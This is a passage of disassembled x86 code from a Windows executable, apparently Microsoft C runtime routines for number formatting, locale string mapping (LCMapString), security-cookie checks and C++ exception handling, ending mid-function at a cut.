lea eax, [ebp+var_14]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+4]
push dword ptr [eax]
call sub_41C7C4
mov esi, [ebp+var_10]
mov ebx, [ebp+arg_8]
xor eax, eax
dec esi
cmp [ebp+var_14], 2Dh
setz al
add eax, [ebp+arg_4]
mov edi, eax
lea eax, [ebp+var_14]
push eax
push ebx
push edi
call sub_41C693
mov eax, [ebp+var_10]
add esp, 1Ch
dec eax
cmp esi, eax
setl cl
cmp eax, 0FFFFFFFCh
jl short loc_4181B5
cmp eax, ebx
jge short loc_4181B5
test cl, cl
jz short loc_4181A5
loc_41819B: ; CODE XREF: sub_418139+67�j
mov al, [edi]
inc edi
test al, al
jnz short loc_41819B
and [edi-2], al
loc_4181A5: ; CODE XREF: sub_418139+60�j
push 1
push ebx
push [ebp+arg_4]
lea eax, [ebp+var_14]
call sub_418035
jmp short loc_4181C6
; ---------------------------------------------------------------------------
loc_4181B5: ; CODE XREF: sub_418139+58�j
; sub_418139+5C�j
push 1
push [ebp+arg_C]
lea eax, [ebp+var_14]
push ebx
mov ebx, [ebp+arg_4]
call sub_417F13
loc_4181C6: ; CODE XREF: sub_418139+7A�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
add esp, 0Ch
pop edi
pop esi
pop ebx
call sub_4182D6
leave
retn
sub_418139 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4181D9 proc near ; DATA XREF: sub_413460�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 65h
jz short loc_418214
cmp [ebp+arg_8], 45h
jz short loc_418214
cmp [ebp+arg_8], 66h
jnz short loc_418201
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4180D1
add esp, 0Ch
pop ebp
retn
; ---------------------------------------------------------------------------
loc_418201: ; CODE XREF: sub_4181D9+13�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_418139
jmp short loc_418225
; ---------------------------------------------------------------------------
loc_418214: ; CODE XREF: sub_4181D9+7�j
; sub_4181D9+D�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_417FC1
loc_418225: ; CODE XREF: sub_4181D9+39�j
add esp, 10h
pop ebp
retn
sub_4181D9 endp
; =============== S U B R O U T I N E =======================================
sub_41822A proc near ; CODE XREF: sub_413498+F�p
push 30000h
push 10000h
call sub_41C991
pop ecx
pop ecx
retn
sub_41822A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41823C proc near ; CODE XREF: sub_41827C:loc_4182A0�j
var_18 = qword ptr -18h
var_10 = qword ptr -10h
var_8 = qword ptr -8
push ebp
mov ebp, esp
sub esp, 18h
fld ds:dbl_427A80
fstp [ebp+var_8]
fld ds:dbl_427A78
fstp [ebp+var_10]
fld [ebp+var_10]
fdiv [ebp+var_8]
fmul [ebp+var_8]
fsubr [ebp+var_10]
fstp [ebp+var_18]
fld [ebp+var_18]
fcomp ds:dbl_427A70
fnstsw ax
test ah, 41h
jnz short loc_418278
xor eax, eax
inc eax
leave
retn
; ---------------------------------------------------------------------------
loc_418278: ; CODE XREF: sub_41823C+35�j
xor eax, eax
leave
retn
sub_41823C endp
; =============== S U B R O U T I N E =======================================
sub_41827C proc near ; CODE XREF: sub_413498+5�p
push offset aKernel32 ; "KERNEL32"
call ds:dword_41F078 ; GetModuleHandleA
test eax, eax
jz short loc_4182A0
push offset aIsprocessorfea ; "IsProcessorFeaturePresent"
push eax
call ds:dword_41F074 ; GetProcAddress
test eax, eax
jz short loc_4182A0
push 0
call eax
retn
; ---------------------------------------------------------------------------
loc_4182A0: ; CODE XREF: sub_41827C+D�j
; sub_41827C+1D�j
jmp sub_41823C
sub_41827C endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4182D6
loc_4182A5: ; CODE XREF: sub_4182D6:loc_4182DF�j
push 8
push offset stru_427EC0
call __SEH_prolog
and dword ptr [ebp-4], 0
push 0
push 1
call sub_41C9FD
pop ecx
pop ecx
jmp short loc_4182C9
; END OF FUNCTION CHUNK FOR sub_4182D6
; =============== S U B R O U T I N E =======================================
sub_4182C2 proc near ; DATA XREF: .rdata:stru_427EC0�o
xor eax, eax
inc eax
retn
sub_4182C2 endp
; ---------------------------------------------------------------------------
loc_4182C6: ; DATA XREF: .rdata:stru_427EC0�o
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_4182D6
loc_4182C9: ; CODE XREF: sub_4182D6-16�j
or dword ptr [ebp-4], 0FFFFFFFFh
push 3
call ds:dword_41F02C ; ExitProcess
int 3 ; Trap to Debugger
; END OF FUNCTION CHUNK FOR sub_4182D6
; =============== S U B R O U T I N E =======================================
sub_4182D6 proc near ; CODE XREF: sub_413859+B4�p
; sub_414CA3+76E�p ...
; FUNCTION CHUNK AT 004182A5 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 004182C9 SIZE 0000000D BYTES
cmp ecx, dword_42CE38
jnz short loc_4182DF
retn
; ---------------------------------------------------------------------------
loc_4182DF: ; CODE XREF: sub_4182D6+6�j
jmp loc_4182A5
sub_4182D6 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4182E4 proc near ; CODE XREF: sub_4139A6+91�p
; sub_4190C6+C8�p ...
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push 38h
push offset stru_427ED0
call __SEH_prolog
xor ebx, ebx
cmp dword_47A018, ebx
jnz short loc_418332
push ebx
push ebx
xor esi, esi
inc esi
push esi
push offset dword_427ECC
push 100h
push ebx
call ds:dword_41F180 ; LCMapStringW
test eax, eax
jz short loc_41831D
mov dword_47A018, esi
jmp short loc_418332
; ---------------------------------------------------------------------------
loc_41831D: ; CODE XREF: sub_4182E4+2F�j
call ds:dword_41F008 ; RtlGetLastWin32Error
cmp eax, 78h
jnz short loc_418332
mov dword_47A018, 2
loc_418332: ; CODE XREF: sub_4182E4+14�j
; sub_4182E4+37�j ...
cmp [ebp+arg_C], ebx
jle short loc_418352
mov ecx, [ebp+arg_C]
mov eax, [ebp+arg_8]
loc_41833D: ; CODE XREF: sub_4182E4+61�j
dec ecx
cmp [eax], bl
jz short loc_41834A
inc eax
cmp ecx, ebx
jnz short loc_41833D
or ecx, 0FFFFFFFFh
loc_41834A: ; CODE XREF: sub_4182E4+5C�j
or eax, 0FFFFFFFFh
sub eax, ecx
add [ebp+arg_C], eax
loc_418352: ; CODE XREF: sub_4182E4+51�j
mov eax, dword_47A018
cmp eax, 2
jz loc_41853C
cmp eax, ebx
jz loc_41853C
cmp eax, 1
jnz loc_41856F
xor edi, edi
mov [ebp+var_1C], edi
mov [ebp+var_20], ebx
mov [ebp+var_24], ebx
cmp [ebp+arg_18], ebx
jnz short loc_418389
mov eax, dword_47A188
mov [ebp+arg_18], eax
loc_418389: ; CODE XREF: sub_4182E4+9B�j
push ebx
push ebx
push [ebp+arg_C]
push [ebp+arg_8]
xor eax, eax
cmp [ebp+arg_1C], ebx
setnz al
lea eax, ds:1[eax*8]
push eax
push [ebp+arg_18]
call ds:dword_41F0A8 ; MultiByteToWideChar
mov esi, eax
mov [ebp+var_28], esi
cmp esi, ebx
jz loc_41856F
mov [ebp+ms_exc.disabled], 1
lea eax, [esi+esi]
add eax, 3
and eax, 0FFFFFFFCh
call sub_412DD0
mov [ebp+ms_exc.old_esp], esp
mov eax, esp
mov [ebp+var_2C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_4183F5
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
call sub_41AE30
xor ebx, ebx
mov [ebp+var_2C], ebx
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov edi, [ebp+var_1C]
mov esi, [ebp+var_28]
loc_4183F5: ; CODE XREF: sub_4182E4+F4�j
cmp [ebp+var_2C], ebx
jnz short loc_418416
lea eax, [esi+esi]
push eax
call sub_41344D
pop ecx
mov [ebp+var_2C], eax
cmp eax, ebx
jz loc_41856F
mov [ebp+var_20], 1
loc_418416: ; CODE XREF: sub_4182E4+114�j
push esi
push [ebp+var_2C]
push [ebp+arg_C]
push [ebp+arg_8]
push 1
push [ebp+arg_18]
call ds:dword_41F0A8 ; MultiByteToWideChar
test eax, eax
jz loc_418519
push ebx
push ebx
push esi
push [ebp+var_2C]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_41F180 ; LCMapStringW
mov edi, eax
mov [ebp+var_1C], edi
cmp edi, ebx
jz loc_418519
test byte ptr [ebp+arg_4+1], 4
jz short loc_418485
cmp [ebp+arg_14], ebx
jz loc_418519
cmp edi, [ebp+arg_14]
jg loc_418519
push [ebp+arg_14]
push [ebp+arg_10]
push esi
push [ebp+var_2C]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_41F180 ; LCMapStringW
jmp loc_418519
; ---------------------------------------------------------------------------
loc_418485: ; CODE XREF: sub_4182E4+172�j
mov [ebp+ms_exc.disabled], 2
lea eax, [edi+edi]
add eax, 3
and eax, 0FFFFFFFCh
call sub_412DD0
mov [ebp+ms_exc.old_esp], esp
mov eax, esp
mov [ebp+var_30], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_4184C3
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
call sub_41AE30
xor ebx, ebx
mov [ebp+var_30], ebx
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov edi, [ebp+var_1C]
mov esi, [ebp+var_28]
loc_4184C3: ; CODE XREF: sub_4182E4+1C2�j
cmp [ebp+var_30], ebx
jnz short loc_4184E0
lea eax, [edi+edi]
push eax
call sub_41344D
pop ecx
mov [ebp+var_30], eax
cmp eax, ebx
jz short loc_418519
mov [ebp+var_24], 1
loc_4184E0: ; CODE XREF: sub_4182E4+1E2�j
push edi
push [ebp+var_30]
push esi
push [ebp+var_2C]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_41F180 ; LCMapStringW
test eax, eax
jz short loc_418519
push ebx
push ebx
cmp [ebp+arg_14], ebx
jnz short loc_418503
push ebx
push ebx
jmp short loc_418509
; ---------------------------------------------------------------------------
loc_418503: ; CODE XREF: sub_4182E4+219�j
push [ebp+arg_14]
push [ebp+arg_10]
loc_418509: ; CODE XREF: sub_4182E4+21D�j
push edi
push [ebp+var_30]
push ebx
push [ebp+arg_18]
call ds:dword_41F0AC ; WideCharToMultiByte
mov edi, eax
loc_418519: ; CODE XREF: sub_4182E4+149�j
; sub_4182E4+168�j ...
cmp [ebp+var_24], ebx
jz short loc_418527
push [ebp+var_30]
call sub_412FE4
pop ecx
loc_418527: ; CODE XREF: sub_4182E4+238�j
cmp [ebp+var_20], ebx
jz short loc_418535
push [ebp+var_2C]
call sub_412FE4
pop ecx
loc_418535: ; CODE XREF: sub_4182E4+246�j
mov eax, edi
jmp loc_418697
; ---------------------------------------------------------------------------
loc_41853C: ; CODE XREF: sub_4182E4+76�j
; sub_4182E4+7E�j
mov [ebp+var_34], ebx
xor edi, edi
mov [ebp+var_38], ebx
cmp [ebp+arg_0], ebx
jnz short loc_418551
mov eax, dword_47A178
mov [ebp+arg_0], eax
loc_418551: ; CODE XREF: sub_4182E4+263�j
cmp [ebp+arg_18], ebx
jnz short loc_41855E
mov eax, dword_47A188
mov [ebp+arg_18], eax
loc_41855E: ; CODE XREF: sub_4182E4+270�j
push [ebp+arg_0]
call sub_41CB47
pop ecx
mov [ebp+var_3C], eax
cmp eax, 0FFFFFFFFh
jnz short loc_418576
loc_41856F: ; CODE XREF: sub_4182E4+87�j
; sub_4182E4+CD�j ...
xor eax, eax
jmp loc_418697
; ---------------------------------------------------------------------------
loc_418576: ; CODE XREF: sub_4182E4+289�j
cmp eax, [ebp+arg_18]
jz loc_41866D
push ebx
push ebx
lea ecx, [ebp+arg_C]
push ecx
push [ebp+arg_8]
push eax
push [ebp+arg_18]
call sub_41CB90
add esp, 18h
mov [ebp+var_34], eax
cmp eax, ebx
jz short loc_41856F
push ebx
push ebx
push [ebp+arg_C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_41F17C ; LCMapStringA
mov esi, eax
mov [ebp+var_40], esi
cmp esi, ebx
jz loc_41865C
mov [ebp+ms_exc.disabled], ebx
add eax, 3
and eax, 0FFFFFFFCh
call sub_412DD0
mov [ebp+ms_exc.old_esp], esp
mov edi, esp
mov [ebp+var_44], edi
push esi
push ebx
push edi
call sub_41ADD0
add esp, 0Ch
jmp short loc_4185ED
; ---------------------------------------------------------------------------
loc_4185DD: ; DATA XREF: .rdata:stru_427ED0�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_4185E1: ; DATA XREF: .rdata:stru_427ED0�o
mov esp, [ebp+ms_exc.old_esp]
call sub_41AE30
xor ebx, ebx
xor edi, edi
loc_4185ED: ; CODE XREF: sub_4182E4+2F7�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
cmp edi, ebx
jnz short loc_418618
push [ebp+var_40]
call sub_41344D
pop ecx
mov edi, eax
cmp edi, ebx
jz short loc_418635
push [ebp+var_40]
push ebx
push edi
call sub_41ADD0
add esp, 0Ch
mov [ebp+var_38], 1
loc_418618: ; CODE XREF: sub_4182E4+30F�j
push [ebp+var_40]
push edi
push [ebp+arg_C]
push [ebp+var_34]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_41F17C ; LCMapStringA
mov [ebp+var_40], eax
cmp eax, ebx
jnz short loc_418639
loc_418635: ; CODE XREF: sub_4182E4+31E�j
xor esi, esi
jmp short loc_41865F
; ---------------------------------------------------------------------------
loc_418639: ; CODE XREF: sub_4182E4+34F�j
push [ebp+arg_14]
push [ebp+arg_10]
lea eax, [ebp+var_40]
push eax
push edi
push [ebp+arg_18]
push [ebp+var_3C]
call sub_41CB90
add esp, 18h
mov esi, eax
neg esi
sbb esi, esi
neg esi
jmp short loc_41865F
; ---------------------------------------------------------------------------
loc_41865C: ; CODE XREF: sub_4182E4+2D0�j
mov esi, [ebp+var_48]
loc_41865F: ; CODE XREF: sub_4182E4+353�j
; sub_4182E4+376�j
cmp [ebp+var_38], ebx
jz short loc_418687
push edi
call sub_412FE4
pop ecx
jmp short loc_418687
; ---------------------------------------------------------------------------
loc_41866D: ; CODE XREF: sub_4182E4+295�j
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_41F17C ; LCMapStringA
mov esi, eax
loc_418687: ; CODE XREF: sub_4182E4+37E�j
; sub_4182E4+387�j
cmp [ebp+var_34], ebx
jz short loc_418695
push [ebp+var_34]
call sub_412FE4
pop ecx
loc_418695: ; CODE XREF: sub_4182E4+3A6�j
mov eax, esi
loc_418697: ; CODE XREF: sub_4182E4+253�j
; sub_4182E4+28D�j
lea esp, [ebp-54h]
call __SEH_epilog
retn
sub_4182E4 endp
; =============== S U B R O U T I N E =======================================
sub_4186A0 proc near ; CODE XREF: sub_418C87+138�p
arg_0 = dword ptr 4
mov eax, [esi+4]
test eax, eax
jz short loc_4186EB
lea edx, [eax+8]
cmp byte ptr [edx], 0
jz short loc_4186EB
mov ecx, [edi+4]
cmp eax, ecx
jz short loc_4186C6
add ecx, 8
push ecx
push edx
call sub_41B4E0
test eax, eax
pop ecx
pop ecx
jnz short loc_4186E8
loc_4186C6: ; CODE XREF: sub_4186A0+14�j
test byte ptr [edi], 2
jz short loc_4186D0
test byte ptr [esi], 8
jz short loc_4186E8
loc_4186D0: ; CODE XREF: sub_4186A0+29�j
mov eax, [esp+arg_0]
mov eax, [eax]
test al, 1
jz short loc_4186DF
test byte ptr [esi], 1
jz short loc_4186E8
loc_4186DF: ; CODE XREF: sub_4186A0+38�j
test al, 2
jz short loc_4186EB
test byte ptr [esi], 2
jnz short loc_4186EB
loc_4186E8: ; CODE XREF: sub_4186A0+24�j
; sub_4186A0+2E�j ...
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4186EB: ; CODE XREF: sub_4186A0+5�j
; sub_4186A0+D�j ...
xor eax, eax
inc eax
retn
sub_4186A0 endp
; =============== S U B R O U T I N E =======================================
sub_4186EF proc near ; CODE XREF: sub_41870D+76�p
mov eax, [eax]
cmp dword ptr [eax], 0E06D7363h
jz short loc_4186FC
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4186FC: ; CODE XREF: sub_4186EF+8�j
call sub_415456
and dword ptr [eax+80h], 0
jmp sub_418F0B
sub_4186EF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41870D proc near ; CODE XREF: sub_41883D+117�p
; sub_418B60+31�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push 10h
push offset stru_427EF8
call __SEH_prolog
mov ebx, [ebp+arg_0]
mov esi, [ebx+8]
mov [ebp+var_1C], esi
call sub_415456
add eax, 80h
inc dword ptr [eax]
and [ebp+ms_exc.disabled], 0
mov edi, [ebp+arg_8]
loc_418735: ; CODE XREF: sub_41870D+8F�j
cmp esi, [ebp+arg_C]
jz short loc_41879E
cmp esi, 0FFFFFFFFh
jle short loc_418744
cmp esi, [edi+4]
jl short loc_418749
loc_418744: ; CODE XREF: sub_41870D+30�j
call sub_418F40
loc_418749: ; CODE XREF: sub_41870D+35�j
mov eax, esi
shl eax, 3
mov ecx, [edi+8]
add ecx, eax
mov esi, [ecx]
mov [ebp+var_20], esi
mov [ebp+ms_exc.disabled], 1
cmp dword ptr [ecx+4], 0
jz short loc_41877A
mov [ebx+8], esi
push 103h
push ebx
mov ecx, [edi+8]
push dword ptr [ecx+eax+4]
call sub_418F70
loc_41877A: ; CODE XREF: sub_41870D+56�j
and [ebp+ms_exc.disabled], 0
jmp short loc_418799
; ---------------------------------------------------------------------------
loc_418780: ; DATA XREF: .rdata:00427F08�o
mov eax, [ebp+ms_exc.exc_ptr]
call sub_4186EF
retn
; ---------------------------------------------------------------------------
loc_418789: ; DATA XREF: .rdata:00427F0C�o
mov esp, [ebp+ms_exc.old_esp]
and [ebp+ms_exc.disabled], 0
mov edi, [ebp+arg_8]
mov ebx, [ebp+arg_0]
mov esi, [ebp+var_20]
loc_418799: ; CODE XREF: sub_41870D+71�j
mov [ebp+var_1C], esi
jmp short loc_418735
; ---------------------------------------------------------------------------
loc_41879E: ; CODE XREF: sub_41870D+2B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_4187C0
cmp esi, [ebp+arg_C]
jz short loc_4187B1
call sub_418F40
loc_4187B1: ; CODE XREF: sub_41870D+9D�j
mov [ebx+8], esi
call __SEH_epilog
retn
sub_41870D endp
; =============== S U B R O U T I N E =======================================
sub_4187BA proc near ; DATA XREF: .rdata:stru_427EF8�o
mov ebx, [ebp+8]
mov esi, [ebp-1Ch]
sub_4187BA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4187C0 proc near ; CODE XREF: sub_41870D+95�p
call sub_415456
cmp dword ptr [eax+80h], 0
jle short locret_4187DA
call sub_415456
add eax, 80h
dec dword ptr [eax]
locret_4187DA: ; CODE XREF: sub_4187C0+C�j
retn
sub_4187C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4187DB proc near ; CODE XREF: sub_418980+5C�p
; sub_418C87+1A8�p
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 8
push offset stru_427F10
call __SEH_prolog
mov eax, [ebp+arg_0]
test eax, eax
jz short loc_418809
mov ecx, [eax+1Ch]
mov ecx, [ecx+4]
test ecx, ecx
jz short loc_418809
and [ebp+ms_exc.disabled], 0
push ecx
push dword ptr [eax+18h]
call sub_413ACE
or [ebp+ms_exc.disabled], 0FFFFFFFFh
loc_418809: ; CODE XREF: sub_4187DB+11�j
; sub_4187DB+1B�j
call __SEH_epilog
retn
sub_4187DB endp
; =============== S U B R O U T I N E =======================================
sub_41880F proc near ; DATA XREF: .rdata:stru_427F10�o
xor eax, eax
cmp [ebp+0Ch], al
setnz al
retn
sub_41880F endp
; ---------------------------------------------------------------------------
loc_418818: ; DATA XREF: .rdata:stru_427F10�o
mov esp, [ebp-18h]
jmp sub_418F0B
; =============== S U B R O U T I N E =======================================
sub_418820 proc near ; CODE XREF: sub_4189E4+7C�p
; sub_4189E4+FB�p ...
mov edx, [ecx+4]
push esi
mov esi, eax
mov eax, [ecx]
add eax, esi
test edx, edx
jl short loc_41883B
mov ecx, [ecx+8]
mov esi, [edx+esi]
mov ecx, [esi+ecx]
add ecx, edx
add eax, ecx
loc_41883B: ; CODE XREF: sub_418820+C�j
pop esi
retn
sub_418820 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41883D proc near ; CODE XREF: sub_418B60+52�p
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
; FUNCTION CHUNK AT 00418977 SIZE 00000003 BYTES
push 40h
push offset stru_427F20
call __SEH_prolog
mov ebx, ecx
mov edi, [ebp+arg_4]
mov esi, [ebp+arg_0]
mov [ebp+var_1C], ebx
and [ebp+var_20], 0
mov eax, [edi-4]
mov [ebp+var_24], eax
push dword ptr [esi+18h]
lea eax, [ebp+var_2C]
push eax
call sub_413C6C
pop ecx
pop ecx
mov [ebp+var_30], eax
call sub_415456
mov eax, [eax+78h]
mov [ebp+var_34], eax
call sub_415456
mov eax, [eax+7Ch]
mov [ebp+var_38], eax
call sub_415456
mov [eax+78h], esi
call sub_415456
mov ecx, [ebp+arg_8]
mov [eax+7Ch], ecx
and [ebp+ms_exc.disabled], 0
mov [ebp+ms_exc.disabled], 1
push [ebp+arg_14]
push [ebp+arg_10]
push ebx
push [ebp+arg_C]
push edi
call sub_413D01
add esp, 14h
mov [ebp+var_1C], eax
and [ebp+ms_exc.disabled], 0
jmp loc_418965
; ---------------------------------------------------------------------------
mov eax, [ebp+ms_exc.exc_ptr]
mov eax, [eax]
mov [ebp+var_3C], eax
mov eax, [ebp+var_3C]
cmp dword ptr [eax], 0E06D7363h
jnz short loc_4188FA
mov eax, [ebp+var_3C]
cmp dword ptr [eax+10h], 3
jnz short loc_4188FA
mov eax, [ebp+var_3C]
cmp dword ptr [eax+14h], 19930520h
jnz short loc_4188FA
mov eax, [ebp+var_3C]
cmp dword ptr [eax+1Ch], 0
mov [ebp+var_40], 1
jz short loc_418901
loc_4188FA: ; CODE XREF: sub_41883D+96�j
; sub_41883D+9F�j ...
mov [ebp+var_40], 0
loc_418901: ; CODE XREF: sub_41883D+BB�j
mov eax, [ebp+var_40]
retn
; ---------------------------------------------------------------------------
loc_418905: ; DATA XREF: .rdata:00427F34�o
mov esp, [ebp+ms_exc.old_esp]
mov ecx, [ebp+arg_C]
mov eax, [ecx+8]
mov [ebp+var_44], eax
mov edi, [ebp+arg_4]
mov eax, [edi+8]
mov [ebp+var_48], eax
mov edx, [ecx+10h]
mov [ebp+var_4C], edx
xor edx, edx
loc_418922: ; CODE XREF: sub_41883D+13B�j
mov [ebp+var_50], edx
cmp edx, [ecx+0Ch]
jnb short loc_41894E
lea esi, [edx+edx*4]
mov ebx, [ebp+var_4C]
lea esi, [ebx+esi*4]
mov ebx, [esi+4]
cmp eax, ebx
jle short loc_418977
cmp eax, [esi+8]
jg short loc_418977
lea eax, [ebx+1]
mov [ebp+var_48], eax
mov edx, [ebp+var_44]
mov eax, [edx+eax*8]
mov [ebp+var_48], eax
loc_41894E: ; CODE XREF: sub_41883D+EB�j
push eax
push ecx
xor esi, esi
push esi
push edi
call sub_41870D
add esp, 10h
mov [ebp+var_1C], esi
mov [ebp+ms_exc.disabled], esi
mov esi, [ebp+arg_0]
loc_418965: ; CODE XREF: sub_41883D+80�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_418980
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_41883D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41883D
loc_418977: ; CODE XREF: sub_41883D+FB�j
; sub_41883D+100�j
inc edx
jmp short loc_418922
; END OF FUNCTION CHUNK FOR sub_41883D
; =============== S U B R O U T I N E =======================================
sub_41897A proc near ; DATA XREF: .rdata:stru_427F20�o
mov edi, [ebp+0Ch]
mov esi, [ebp+8]
sub_41897A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_418980 proc near ; CODE XREF: sub_41883D+12C�p
mov eax, [ebp-24h]
mov [edi-4], eax
push dword ptr [ebp-30h]
call sub_413CB5
pop ecx
call sub_415456
mov ecx, [ebp-34h]
mov [eax+78h], ecx
call sub_415456
mov ecx, [ebp-38h]
mov [eax+7Ch], ecx
cmp dword ptr [esi], 0E06D7363h
jnz short locret_4189E3
cmp dword ptr [esi+10h], 3
jnz short locret_4189E3
cmp dword ptr [esi+14h], 19930520h
jnz short locret_4189E3
cmp dword ptr [ebp-20h], 0
jnz short locret_4189E3
cmp dword ptr [ebp-1Ch], 0
jz short locret_4189E3
push dword ptr [esi+18h]
call sub_413C94
pop ecx
test eax, eax
jz short locret_4189E3
call sub_413EAE
push eax
push esi
call sub_4187DB
pop ecx
pop ecx
locret_4189E3: ; CODE XREF: sub_418980+2B�j
; sub_418980+31�j ...
retn
sub_418980 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4189E4 proc near ; CODE XREF: sub_418B60+D�p
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push 8
push offset stru_427F38
call __SEH_prolog
mov esi, ecx
mov eax, [ebp+arg_4]
mov edi, edx
mov ebx, [ebp+arg_0]
mov ecx, [eax+4]
test ecx, ecx
jz loc_418B4E
cmp byte ptr [ecx+8], 0
jz loc_418B4E
mov ecx, [eax+8]
test ecx, ecx
jnz short loc_418A20
test byte ptr [eax+3], 80h
jz loc_418B4E
loc_418A20: ; CODE XREF: sub_4189E4+30�j
mov eax, [eax]
test eax, eax
js short loc_418A2A
lea edi, [ecx+edi+0Ch]
loc_418A2A: ; CODE XREF: sub_4189E4+40�j
and [ebp+ms_exc.disabled], 0
push 1
push dword ptr [ebx+18h]
test al, 8
jz short loc_418A6C
call sub_41CDC5
pop ecx
pop ecx
test eax, eax
jz loc_418B45
push 1
push edi
call sub_41CDE1
pop ecx
pop ecx
test eax, eax
jz loc_418B45
mov eax, [ebx+18h]
mov [edi], eax
loc_418A5D: ; CODE XREF: sub_4189E4+D1�j
lea ecx, [esi+8]
call sub_418820
mov [edi], eax
jmp loc_418B4A
; ---------------------------------------------------------------------------
loc_418A6C: ; CODE XREF: sub_4189E4+51�j
test byte ptr [esi], 1
jz short loc_418AB7
call sub_41CDC5
pop ecx
pop ecx
test eax, eax
jz loc_418B45
push 1
push edi
call sub_41CDE1
pop ecx
pop ecx
test eax, eax
jz loc_418B45
push dword ptr [esi+14h]
push dword ptr [ebx+18h]
push edi
call sub_41BC70
add esp, 0Ch
cmp dword ptr [esi+14h], 4
jnz loc_418B4A
mov eax, [edi]
test eax, eax
jz loc_418B4A
jmp short loc_418A5D
; ---------------------------------------------------------------------------
loc_418AB7: ; CODE XREF: sub_4189E4+8B�j
cmp dword ptr [esi+18h], 0
jnz short loc_418AF0
call sub_41CDC5
pop ecx
pop ecx
test eax, eax
jz short loc_418B45
push 1
push edi
call sub_41CDE1
pop ecx
pop ecx
test eax, eax
jz short loc_418B45
push dword ptr [esi+14h]
lea ecx, [esi+8]
mov eax, [ebx+18h]
call sub_418820
push eax
push edi
call sub_41BC70
add esp, 0Ch
jmp short loc_418B4A
; ---------------------------------------------------------------------------
loc_418AF0: ; CODE XREF: sub_4189E4+D7�j
call sub_41CDC5
pop ecx
pop ecx
test eax, eax
jz short loc_418B45
push 1
push edi
call sub_41CDE1
pop ecx
pop ecx
test eax, eax
jz short loc_418B45
push dword ptr [esi+18h]
call sub_41CDFD
pop ecx
test eax, eax
jz short loc_418B45
mov eax, [ebx+18h]
lea ecx, [esi+8]
test byte ptr [esi], 4
jz short loc_418B34
push 1
call sub_418820
push eax
push dword ptr [esi+18h]
push edi
call sub_413ACE
jmp short loc_418B4A
; ---------------------------------------------------------------------------
loc_418B34: ; CODE XREF: sub_4189E4+13B�j
